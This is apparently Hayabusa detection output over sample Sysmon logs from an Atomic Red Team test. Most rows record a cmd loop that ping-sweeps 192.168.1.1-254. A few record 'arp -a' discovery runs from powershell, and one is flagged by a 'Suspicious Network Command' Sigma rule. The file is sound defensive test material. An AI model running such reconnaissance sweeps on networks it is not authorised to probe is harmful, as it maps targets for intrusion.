2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Suspicious Network Command,,rules/sigma/process_creation/win_pc_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: arp -a : Path: C:\Windows\System32\ARP.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""arp -a""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
